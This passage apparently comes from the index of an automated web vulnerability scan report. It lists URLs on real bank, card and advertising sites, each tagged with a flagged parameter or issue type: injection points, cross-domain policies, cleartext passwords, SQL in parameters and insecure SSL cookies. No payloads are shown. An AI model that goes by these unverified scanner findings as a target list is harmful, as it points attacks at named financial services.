4.515. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]

4.516. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]

4.517. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

4.518. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

4.519. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]

4.520. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]

4.521. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]

4.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]

4.523. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

4.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

4.525. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]

4.526. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

4.527. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

4.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

4.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

4.530. http://www.thehealthreport.net/ac-usap.php [sub parameter]

4.531. http://www.us.hsbc.com/1/2/3 [hp_pref parameter]

4.532. http://www.us.hsbc.com/1/2/3/hsbcpremier/apply [code parameter]

4.533. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

4.534. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

4.535. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

4.536. http://www201.americanexpress.com/business-credit-cards/ [inav parameter]

4.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]

4.538. http://www201.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]

4.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

4.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

4.541. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

4.542. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

4.543. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]

4.544. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]

4.545. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]

4.546. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]

4.547. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]

4.548. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]

4.549. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]

4.550. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]

4.551. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]

4.552. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]

4.553. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]

4.554. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]

4.555. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]

4.556. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]

4.557. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]

4.558. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]

4.559. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]

4.560. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]

4.561. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]

4.562. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]

4.563. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]

4.564. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]

4.565. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]

4.566. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]

4.567. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]

4.568. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]

4.569. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]

4.570. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]

4.571. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]

4.572. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]

4.573. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]

4.574. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]

4.575. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]

4.576. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]

4.577. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]

4.578. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]

4.579. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]

4.580. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]

4.581. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]

4.582. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]

4.583. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]

4.584. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]

4.585. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]

4.586. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]

4.587. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]

4.588. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]

4.589. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]

4.590. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]

4.591. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]

4.592. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]

4.593. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]

4.594. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]

4.595. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]

4.596. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]

4.597. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]

4.598. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]

4.599. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]

4.600. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]

4.601. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]

4.602. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]

4.603. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]

4.604. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]

4.605. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]

4.606. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]

4.607. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]

4.608. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]

4.609. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]

4.610. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]

4.611. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]

4.612. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]

4.613. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]

4.614. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]

4.615. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]

4.616. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]

4.617. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]

4.618. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]

4.619. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]

4.620. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]

4.621. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]

4.622. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]

4.623. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]

4.624. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]

4.625. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]

4.626. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]

4.627. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]

4.628. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]

4.629. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]

4.630. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]

4.631. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]

4.632. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]

4.633. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]

4.634. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]

4.635. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]

4.636. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]

4.637. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]

4.638. http://yellowpages.superpages.com/listings.jsp [C parameter]

4.639. http://yellowpages.superpages.com/listings.jsp [C parameter]

4.640. http://yellowpages.superpages.com/listings.jsp [REST URL parameter 1]

4.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]

4.642. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 1]

4.643. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 2]

4.644. http://yellowpages.superpages.com/profile.jsp [LID%3D parameter]

4.645. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]

4.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]

4.647. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]

4.648. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]

4.649. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]

4.650. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]

4.651. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]

4.652. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]

4.653. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]

4.654. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]

4.655. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]

4.656. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]

4.657. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]

4.658. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]

4.659. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]

4.660. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]

4.661. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]

4.662. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]

4.663. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]

4.664. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]

4.665. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

4.666. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

4.667. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

4.668. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

4.669. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

4.670. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

4.671. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

4.672. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

4.673. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

4.674. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

4.675. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

4.676. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

4.677. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

4.678. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

4.679. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

4.680. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

4.681. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

4.682. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

4.683. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

4.684. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

4.685. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

4.686. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

4.687. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

4.688. http://www.experts123.com/questions/ask [Referer HTTP header]

4.689. http://www.experts123.com/questions/filter/bank [Referer HTTP header]

4.690. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

4.691. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

4.692. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

4.693. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]

4.694. http://www.us.hsbc.com/1/2/3 [Referer HTTP header]

4.695. http://bh.contextweb.com/bh/sync/admeld [V cookie]

4.696. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

4.697. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

4.698. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

4.699. http://da.newstogram.com/hg.php [DMUserTrack cookie]

4.700. http://gsbmtg.rtrk.com/ [RlocalUID cookie]

4.701. http://optimized-by.rubiconproject.com/a/6272/9319/15153-15.js [ruid cookie]

4.702. http://optimized-by.rubiconproject.com/a/6272/9319/15153-2.js [ruid cookie]

4.703. http://porscheusa.com/911GTS-mosaic [REST URL parameter 1]

4.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]

4.705. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]

4.706. http://www.feedzilla.com/rss/flash_feed.asp [Cat2 parameter]

4.707. http://www.feedzilla.com/rss/flash_feed.asp [cat parameter]

5. Flash cross-domain policy

5.1. http://18.xg4ken.com/crossdomain.xml

5.2. https://220marketing9-px.rtrk.com/crossdomain.xml

5.3. http://69.16.184.135/crossdomain.xml

5.4. http://a.rfihub.com/crossdomain.xml

5.5. http://a.tribalfusion.com/crossdomain.xml

5.6. http://ad.br.doubleclick.net/crossdomain.xml

5.7. http://ad.doubleclick.net/crossdomain.xml

5.8. http://admin.brightcove.com/crossdomain.xml

5.9. http://ajax.googleapis.com/crossdomain.xml

5.10. http://api.feedzilla.com/crossdomain.xml

5.11. http://beacon.afy11.net/crossdomain.xml

5.12. http://c5.zedo.com/crossdomain.xml

5.13. http://c7.zedo.com/crossdomain.xml

5.14. http://dev.virtualearth.net/crossdomain.xml

5.15. https://graph.facebook.com/crossdomain.xml

5.16. http://gsbmtg.rtrk.com/crossdomain.xml

5.17. http://i1.ytimg.com/crossdomain.xml

5.18. http://lab.arc90.com/crossdomain.xml

5.19. http://loga2.doubleverify.com/crossdomain.xml

5.20. http://motifcdn2.doubleclick.net/crossdomain.xml

5.21. http://netweather.accuweather.com/crossdomain.xml

5.22. http://news.feedzilla.com/crossdomain.xml

5.23. http://omnituretrack.local.com/crossdomain.xml

5.24. http://questionmarket.com/crossdomain.xml

5.25. http://rtsys.reachlocal.com/crossdomain.xml

5.26. http://rtsys.rtrk.com/crossdomain.xml

5.27. http://s.ytimg.com/crossdomain.xml

5.28. http://s0.2mdn.net/crossdomain.xml

5.29. http://s1.srtk.net/crossdomain.xml

5.30. http://tags.crwdcntrl.net/crossdomain.xml

5.31. http://vortex.accuweather.com/crossdomain.xml

5.32. http://weather.weatherbug.com/crossdomain.xml

5.33. http://www.accuweather.com/crossdomain.xml

5.34. http://www1.member-hsbc-group.com/crossdomain.xml

5.35. http://xads.zedo.com/crossdomain.xml

5.36. http://ziggymedia.go2cloud.org/crossdomain.xml

5.37. http://api.bing.com/crossdomain.xml

5.38. http://clicks.superpages.com/crossdomain.xml

5.39. https://imgssl.superpages.com/crossdomain.xml

5.40. http://media.superpages.com/crossdomain.xml

5.41. http://static.ak.fbcdn.net/crossdomain.xml

5.42. http://us.rd.yahoo.com/crossdomain.xml

5.43. http://www.apple.com/crossdomain.xml

5.44. http://advertising.microsoft.com/crossdomain.xml

5.45. http://citi.bridgetrack.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.br.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.doubleclick.net/clientaccesspolicy.xml

6.3. http://dev.virtualearth.net/clientaccesspolicy.xml

6.4. http://omnituretrack.local.com/clientaccesspolicy.xml

6.5. http://s0.2mdn.net/clientaccesspolicy.xml

6.6. http://api.bing.com/clientaccesspolicy.xml

6.7. http://www.microsoft.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania

7.2. http://forums.accuweather.com/

7.3. http://lists.arin.net/mailman/listinfo/arin-tech-discuss

7.4. http://online.barrons.com/article/SB50001424052970203537304576017783391376872.html

7.5. http://thestreet.adsonar.com/admin/advertisers/indexPl.jsp

7.6. http://www.local.com/

7.7. http://www.local.com/business/

7.8. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

7.9. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

7.10. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

7.11. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

7.12. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

7.13. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

7.14. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

7.15. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

7.16. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

7.17. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

7.18. http://www.local.com/business/results/

7.19. http://www.local.com/contact.aspx

7.20. http://www.local.com/coupons/

7.21. http://www.local.com/coupons/printable/

7.22. http://www.local.com/dialogs/register.aspx

7.23. http://www.local.com/events/

7.24. http://www.local.com/events/category/music/dallas-tx.aspx

7.25. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

7.26. http://www.local.com/events/category/sports/dallas-tx.aspx

7.27. http://www.local.com/faq.aspx

7.28. http://www.local.com/privacy/

7.29. http://www.local.com/results.aspx

7.30. http://www.local.com/results/

7.31. http://www.local.com/sitemap.aspx

7.32. http://www.local.com/sitemap/chicago-il.aspx

7.33. http://www.local.com/sitemap/los-angeles-ca.aspx

7.34. http://www.local.com/sitemap/new-york-ny.aspx

7.35. http://www.local.com/terms/

7.36. http://www.local.com/topics/

7.37. http://www.sipc.org/

7.38. http://www.sipc.org/index.cfm

7.39. http://www.supermedia.com/

8. XML injection

8.1. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 1]

8.2. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 2]

8.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

8.4. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

8.5. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 1]

8.6. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 2]

8.7. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 3]

8.8. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 4]

8.9. http://loadus.exelator.com/load/ [REST URL parameter 1]

8.10. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

8.11. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

8.12. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 2]

8.13. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 3]

8.14. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 2]

8.15. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 3]

8.16. http://urlwww--feedzilla--com.rtrk.com/tools/hcc.asp [REST URL parameter 1]

8.17. http://urlwww--feedzilla--com.rtrk.com/tools/swfobject.js [REST URL parameter 1]

8.18. http://weather.weatherbug.com/ [zip parameter]

8.19. http://www.myfinances.com/solo [REST URL parameter 1]

8.20. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 1]

8.21. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 2]

8.22. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 3]

9. SQL statement in request parameter

9.1. https://app.insightgrit.com/1/nat

9.2. https://app.insightgrit.com/Visit37.php

9.3. https://www.supermedia.com/spportal/spportalFlow.do

10. SSL cookie without secure flag set

10.1. https://220marketing9-px.rtrk.com/

10.2. https://app.insightgrit.com/Visit37.php

10.3. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

10.4. https://icapture.regions.com/

10.5. https://mappoint-css.live.com/mwssignup/

10.6. https://mymortgage.regionsmortgage.com/upmb/disp

10.7. https://online.americanexpress.com/myca/fuidfyp/us/action

10.8. https://online.americanexpress.com/myca/logon/us/action

10.9. https://online.americanexpress.com/myca/ocareg/us/action

10.10. https://onlineimagelockbox.regions.com/

10.11. https://profile.microsoft.com/RegSysProfileCenter/default.aspx

10.12. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

10.13. https://secure.opinionlab.com/comment20AMX.asp

10.14. https://secure.thepaymentwindow.com/epayments/default.asp

10.15. https://securebank.regions.com/ForgottenPassword.aspx

10.16. https://securebank.regions.com/login.aspx

10.17. https://www.consumercardaccess.com/main/spectrum/Home

10.18. https://www.morgankeegan.com/ca/mkca.aspx

10.19. https://www.planservices.com/regions/

10.20. https://www.regions.com/personal_banking.rf

10.21. https://www.sponsorinsight.com/regions/index.cfm

10.22. https://www.suntrust.com/portal/server.pt

10.23. https://www124.americanexpress.com/cards/benefits/

10.24. https://www201.americanexpress.com/MobileWeb/index.jsp

10.25. https://www201.americanexpress.com/cards/DecodeServlet

10.26. https://www201.americanexpress.com/secure/my-special-offers

10.27. https://www201.americanexpress.com/smsweb/un_Landing.do

10.28. https://www209.americanexpress.com/merchant/marketing-data/pages/home

10.29. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

10.30. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

10.31. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

10.32. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalcards.do

10.33. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

10.34. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

10.35. https://www257.americanexpress.com/openhome/smallbusiness.do

10.36. https://www295.americanexpress.com/cards/home.do

10.37. https://www295.americanexpress.com/entertainmentaccess/home.do

10.38. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

10.39. https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do

10.40. https://www3.citizensbankonline.com/efs/servlet/efs/default.jsp

10.41. https://www3.citizensbankonline.com/efs/servlet/efs/enter-password-help.jsp

10.42. https://www3.citizensbankonline.com/efs/servlet/efs/invalidate.jsp

10.43. https://www3.citizensbankonline.com/efs/servlet/efs/login.jsp

10.44. https://www3.citizensbankonline.com/efs/servlet/efs/secure-login-help.jsp

10.45. https://www3.citizensbankonline.com/efs/servlet/efs/wait.jsp

10.46. https://ad.doubleclick.net/activity

10.47. https://axptravel.americanexpress.com/consumertravel/travel.do

10.48. https://easyview.us.hsbc.com/yodlee_index.html

10.49. https://espanol.regions.com/regions/enes/24/_

10.50. https://expresstradelc.regions.com/icc

10.51. https://feedback.live.com/default.aspx

10.52. https://home.americanexpress.com/home/corporations.shtml

10.53. https://home.americanexpress.com/home/global_splash.html

10.54. https://home.americanexpress.com/home/js/ad_login.js

10.55. https://home.americanexpress.com/home/mt_personal.shtml

10.56. https://home.americanexpress.com/home/pz/pes_basic.js

10.57. https://home.americanexpress.com/home/pz/pes_login.js

10.58. https://itreasury.regions.com/

10.59. https://labs.wellsfargo.com/rapidalerts/

10.60. https://online.americanexpress.com/myca/acctsumm/us/action

10.61. https://online.bbandt.com/online/selfservice/main.do

10.62. https://online.bbandt.com/online/selfservice/main.do

10.63. https://online.wellsfargo.com/das/channel/enrollDisplay

10.64. https://online.wellsfargo.com/signon

10.65. https://onlineservices.wachovia.com/auth/AuthService

10.66. https://payroll.regions.com/servlet/gateway

10.67. https://pfo.us.hsbc.com/hsbcpb/

10.68. https://quickaccount.us.hsbc.com/jsp/oao/relc/cashedge/oao_application_retrieve.jsp

10.69. https://sales.liveperson.net/hc/13041680/

10.70. https://sslgypsy-test.superpages.com/

10.71. https://tokens.regions.com/

10.72. https://redcated/jaction/00asup_RetargetingSecure_1

10.73. https://vms.boldchat.com/aid/3760177095415339810/bc.pv

10.74. https://www.americanexpress.com/airlines-credit-card/

10.75. https://www.americanexpress.com/credit-card-rewards/

10.76. https://www.americanexpress.com/gift/giftcardslanding.shtml

10.77. https://www.americanexpress.com/gold-card/

10.78. https://www.americanexpress.com/no-annual-fee-credit-cards/

10.79. https://www.banking.us.hsbc.com/HICServlet

10.80. https://www.mystreetscape.com/my/citizensinvest

10.81. https://www.openforum.com/

10.82. https://www.regions.com/

10.83. https://www.regions.com/App_Themes/Default/img/arrowGray_Small.gif

10.84. https://www.regions.com/App_Themes/Default/img/arrowOrange.gif

10.85. https://www.regions.com/App_Themes/Default/img/bgDot.gif

10.86. https://www.regions.com/App_Themes/Default/img/logoEqualHousingLender.gif

10.87. https://www.regions.com/App_Themes/Default/screen.css

10.88. https://www.regions.com/Contact.rf

10.89. https://www.regions.com/FAQ/insured_deposits.rf

10.90. https://www.regions.com/GoogleSearch.rf

10.91. https://www.regions.com/Locator.rf

10.92. https://www.regions.com/Rates.rf

10.93. https://www.regions.com/about_regions.rf

10.94. https://www.regions.com/about_regions/economic_update.rf

10.95. https://www.regions.com/commercial_banking.rf

10.96. https://www.regions.com/favicon.ico

10.97. https://www.regions.com/img/btnDownArrow.gif

10.98. https://www.regions.com/img/btnRightArrow.gif

10.99. https://www.regions.com/img/left.gif

10.100. https://www.regions.com/img/logoRegions_213x45.gif

10.101. https://www.regions.com/js/loadMedia.js

10.102. https://www.regions.com/js/wtbase.js

10.103. https://www.regions.com/mortgage.rf

10.104. https://www.regions.com/personal_banking/alternative_education_loans.rf

10.105. https://www.regions.com/personal_banking/auto_loans.rf

10.106. https://www.regions.com/personal_banking/cds.rf

10.107. https://www.regions.com/personal_banking/checking.rf

10.108. https://www.regions.com/personal_banking/credit_cards.rf

10.109. https://www.regions.com/personal_banking/ehl.rf

10.110. https://www.regions.com/personal_banking/email_starting_net.rf

10.111. https://www.regions.com/personal_banking/everyday_banking.rf

10.112. https://www.regions.com/personal_banking/get_started_online_statements.rf

10.113. https://www.regions.com/personal_banking/home_equity_main.rf

10.114. https://www.regions.com/personal_banking/insurance.rf

10.115. https://www.regions.com/personal_banking/investing.rf

10.116. https://www.regions.com/personal_banking/loan_payment_hardship.rf

10.117. https://www.regions.com/personal_banking/loans_credit.rf

10.118. https://www.regions.com/personal_banking/mobile_banking.rf

10.119. https://www.regions.com/personal_banking/money_market_main.rf

